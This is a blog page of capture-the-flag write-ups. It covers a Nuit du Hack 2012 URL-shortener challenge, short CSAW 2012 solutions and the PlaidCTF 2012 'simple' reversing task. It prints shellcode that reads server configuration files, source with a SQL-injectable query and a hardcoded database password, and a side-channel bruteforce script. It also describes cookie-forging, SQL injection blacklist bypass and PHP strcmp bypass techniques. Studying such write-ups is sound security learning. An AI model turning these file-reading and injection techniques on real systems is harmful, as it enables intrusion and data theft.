  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 From: Jessica To: LSE Subject: New email from our contact Attachments : executable2.ndh Thank you again for your help, our technical staff has a pretty good overview of the new device designed by Sciteek. Your account will be credited with $500. You did work hard enough to impress me, your help is still more than welcome, you will get nice rewards. Our anonymous guy managed to get access to another bunch of files. Here is one of his emails: --- Hi there, see attached file for more information. It was found on http://sci.nuitduhack.com/EgZ8sv12. --- Maybe you can get further than him by exploiting this website. We also need to get as much information as possible about the file itself. If you succeed, you will be rewarded with$2500 for the ndh file and $1000 for the website. Please use "Sciteek shortener" and "strange binary file #2" titles. Regards, Jessica.  Let's ignore the file at the given URL (this is for another writeup!) and work on the URL shortener website mentioned in this email: sci.nuitduhack.com. After experimenting a bit, we noticed several interesting points: • The short URL is apparently random, and trying to access a non-existent one give us "An unknown error occurred. Please try later." • If no short URL is provided, the following error message is displayed: "No URL alias found in URL" We looked at the web server informations to get more data on where to start attacking. This is the HTTP response to an invalid short URL:  1 2 3 4 5 6 7 HTTP/1.1 200 WSGI-GENERATED Server: nginx Date: Sat, 24 Mar 2012 21:40:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding  The WSGI-GENERATED string informs us that the website is coded in Python using the WSGI interface to communicate with the web server. Also, even though nginx is mentioned in the HTTP response, sending some erroneous queries shows us that in fact nginx is only used as a reverse proxy in front of an Apache 2 server:   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 $ curl -vvv http://sci.nuitduhack.com/% * About to connect() to sci.nuitduhack.com port 80 (#0) * Trying 176.34.97.189... * connected * Connected to sci.nuitduhack.com (176.34.97.189) port 80 (#0) > GET /% HTTP/1.1 > User-Agent: curl/7.24.0 (x86_64-unknown-linux-gnu) libcurl/7.24.0 OpenSSL/1.0.0g zlib/1.2.6 libssh2/1.3.0 > Host: sci.nuitduhack.com > Accept: */* > < HTTP/1.1 400 Bad Request < Server: nginx < Date: Sat, 24 Mar 2012 21:42:06 GMT < Content-Type: text/html; charset=iso-8859-1 < Content-Length: 226 < Connection: keep-alive < Vary: Accept-Encoding < 400 Bad Request

Bad Request

Your browser sent a request that this server could not understand.

* Connection #0 to host sci.nuitduhack.com left intact 

We knew that we could use the server running on port 4004 to access the filesystem through a shellcode running in the VM. We used that to confirm that an Apache 2 server was installed and running on the server, using the following shellcode:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 MOVB R0, #0x2 MOVL R1, :filename MOVB R2, #0x0 SYSCALL ; open(filename, O_RDONLY) MOV R7, R0 .label :loop MOVB R0, #0x03 MOV R1, R7 MOV R2, SP MOVB R3, #0x01 SYSCALL ; read(fd, sp, 1) TEST R0, R0 JNZ :read_ok END .label :read_ok MOVB R0, #0x04 MOVB R1, #0x01 MOV R2, SP MOVB R3, #0x01 SYSCALL ; write(stdout, sp, 1) JMPS :loop .label :filename .ascii "/etc/apache2/apache2.conf" 

Using this shellcode we were able to read /etc/apache2/apache2.conf, as well as the default vhost (/etc/apache2/sites-enabled/default) and the Apache 2 PID file (/var/run/apache2.pid). We then tried to access the URL shortener vhost. After a few tries and a lot of luck, we found out that it was named shortner instead of shortener. Here is its virtual host configuration:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17  ServerAdmin webmaster@localhost ServerName sci.nuitduhack.com DocumentRoot /var/www/shortner Options FollowSymLinks AllowOverride None WSGIScriptAlias / /var/www/shortner/app.py Options FollowSymLinks AllowOverride None Order allow,deny Allow from All 

We then read the application source code, and after a few hops we got this file which handles the HTTP queries:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 from apwal import * from apwal.core.exceptions import ExternalRedirect from apwal.http import HttpResponse,HttpResponseRedirect from MySQLdb import * user = 'shortner' passwd = 'TzuFsms8' db = 'shortner' class ErrorOccurred(Exception): def __init__(self): Exception.__init__(self) class Shortner: def __init__(self): # connect to our database self.conn = connect(host='localhost',user=user, passwd=passwd,db=db,port=3306) def getUrlFromAlias(self, alias): cur = self.conn.cursor() cur.execute("SELECT url FROM shortner WHERE alias='%s'" % alias) res = cur.fetchone() cur.close() if res: return res[0] return None def close(self): self.conn.close() @main class URLShortner(Pluggable): def getRealUrlFromAlias(self, alias): s = Shortner() url = s.getUrlFromAlias(alias) s.close() return url def error(self): return HttpResponse('An unknown error occurred. Please try later.') @bind('/{id:(.+)}?') def index(self,urlparams=None): if urlparams and ('id' in urlparams) and urlparams['id']: if urlparams['id']=='mMVzJ8Qj/flag.txt': return HttpResponse('b92b5e7094c7ffb35a526c9eaa6fab0a') elif urlparams['id']=='EgZ8sv12': return HttpResponse( open('/var/www/shortner/crackme2.ndh','rb').read() ) else: try: if 'BENCHMARK' in urlparams['id'].upper(): raise ErrorOccurred() r = self.getRealUrlFromAlias(urlparams['id']) if r: return HttpResponseRedirect(r) raise ErrorOccurred() except ProgrammingError,e: return self.error() except ErrorOccurred,e: return self.error() else: return HttpResponse( 'Sciteek URL shortener' '

No URL alias found in URL !

' ) 

According to the code, it looks like we should have been able to inject SQL through the short URL! Indeed, the query parameter is not escaped before being interpolated with % in the query (a correct way to do it would have been to remove the manual interpolation and let the Python MySQL client lib do it itself!). But there is no need to do that, the flag is already present in the code source: b92b5e7094c7ffb35a526c9eaa6fab0a.

LSE blog: teaching you how to pwn web challenges without doing dirty web exploits!

• # CSAW CTF 2012: for200-500/net100-200/re100-400/web100-300/web600 writeups

Written by Pierre Bourdon
2012-10-01 00:00:00

This article regroups writeups for several challenges which did not deserve a full article.

## for200 (1)

When you decode the chunks of the PNG file individually only one has a CRC error. It contains text which is the key to submit.

## for200 (2)

When you decode the chunks of the PNG file individually only one text chunk has no CRC error. It contains text which is the key to submit.

## for500

strings

## net100

Open with Wireshark, "Follow TCP Stream" and notice a password being sent to a telnet server. This is the key.

## net200

Find the POST request to a <form> on the New York bar website. The text sent with that form contains the key.

## re100

Open the executable with IDA, notice a function that does c XOR 0xFF on every byte of a string, locate the string, apply the xor, get the key.

## re200

Open the executable with Reflector, notice a function that does a XOR once again, reverse the operation, get the key.

## re300

A bit more complicated this time: the decryption function needs a key, and the only thing we know is that the MD5 of the key is ff97a9fdede09eaf6e1c8ec9f6a61dd5. A Google Search tells us that this is MD5(Intel). This is still not the final key: the program uses that to decrypt a buffer using AES. Doing the same gives us the key to submit.

## re400

Open the binary with IDA, notice a decrypt function that does NOT c, locate the string, apply the NOT, get the key.

## web100

The auth is done through a cookie. Modify it (set username to admin), done.

## web200

The SQL query allows us to inject something mysqli_real_escape'd in a LIKE clause, including % and _. We can use that to select multiple users and have one matching the $auth condition (valid password, we register him) and one matching the $admin condition (username == Administrator).

## web300

There is an SQL injection on the horses.php page. You can't normally use the select or union keywords (blacklisted), but if there is an equal sign before the keyword in the request it somehow works. From there we listed the tables in INFORMATION_SCHEMA, found a sessions table containing a session for the admin user, used it to get the key. This was not the way the author expected people to solve his exercise and this bug was fixed during CTF.

## web600

In PHP strcmp/strcasecmp with an array fails and returns 0. We can use that to bypass the check and get the key to be printed.

• # PlaidCTF 2012 "simple" writeup

Written by Pierre Bourdon
2012-04-30 13:05:00

simple is a binary that waits for a string on stdin and returns whether the input was the valid key or not. It does that in a very interesting way: there are only 112 bytes of executable x86 code in this 45K binary. After a bit of static analysis in IDA we found out that these 112 bytes implement a common One Instruction Set Computer virtual machine for the subleq architecture with two very simple twists.

A subleq computer works in a very simple way: only one instruction can be executed: subleq a, b, c (with a, b and c three addresses). This instruction computes *b = *b - *a then jumps to c if *b <= 0.

The binary starts by loading 0x323ac into the esp register, then for each iteration of the loop pops 3 values from the stack. This is the "fetch" state of the virtual machine. After that, a normal subleq computer would simply execute a substraction and a conditional jump. Here, the VM starts by checking if a is an invalid address (less than 0). If it is, it executes a read syscall to read a single character to *b. Then, it checks if b is an invalid address. If it is, it executes a write syscall to write a single character from *a. Then if both addresses are valid it executes a standard subleq.

We started to reverse the whole bytecode for that virtual machine, but reversing something made of several thousands of identical instructions is really hard and we weren't really able to find anything interesting through static analysis.

We then tried to combine static and dynamic analysis by tracing the bytecode to see which instructions were executed and in which order. Using gdb and breaking on the first instruction of the VM loop, it is easy to get the address of the current instruction. When we were reading some traces we noticed that the bytecode was (obviously) doing loops: to read characters until a newline, but also probably to check if the input string is valid. That means that we can actually count how much loop iterations were performed for our input by counting how much instructions were executed. This is basically a timing attack applied to a virtual machine.

We used this to bruteforce the input string one character by one character using the charset [a-zA-Z0-9_-]. For each character added to the input we counted the number of instructions the VM executed and noticed that this number varied slightly:

 1 2 3 4 5 6 7 8 9 trying key 'h'... 2997 trying key 'i'... 2997 trying key 'j'... 2997 trying key 'k'... 2997 trying key 'l'... 2977 trying key 'm'... 2993 trying key 'n'... 2993 trying key 'o'... 2993 trying key 'p'... 2993 

The character l had a lower count and every character after it was slightly lower than characters before it. We assumed that it was because it was a valid first character. We then bruteforced all the other characters before getting to the final solution of this problem:

  1 2 3 4 5 6 7 8 9 10 11 trying key 'l3ss_1s_m0r3z'... 12309 trying key 'l3ss_1s_m0r3_'... 12309 trying key 'l3ss_1s_m0r3-'... 12309 trying key 'l3ss_1s_m0r3!'... 14559 trying key 'l3ss_1s_m0r30'... 12309 trying key 'l3ss_1s_m0r31'... 12309 trying key 'l3ss_1s_m0r32'... 12309 $./simple l3ss_1s_m0r3! Key: l3ss_1s_m0r3!  Here is the script we used to bruteforce the key character by character:   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 #! /bin/sh current_guess="$1" charset="a b c d e f g h i j k l m n o p q r s t u v w x y z" charset="$charset _ - ! 0 1 2 3 4 5 6 7 8 9" # Simple GDB script: disable the paging with "set height 0", then define a # recursive function which prints "instr" and continues to the next breakpoint. # GDB has a recursion limit so we have to execute "countinstrs" several times :/ cat > gdbscript < guess echo -n "trying key '$guess'... " gdb ./simple < gdbscript 2>&1 \ | grep '^\$.*= "instr"$' \ | tail -1 \ | cut -d ' ' -f 1 \ | cut -c 2- done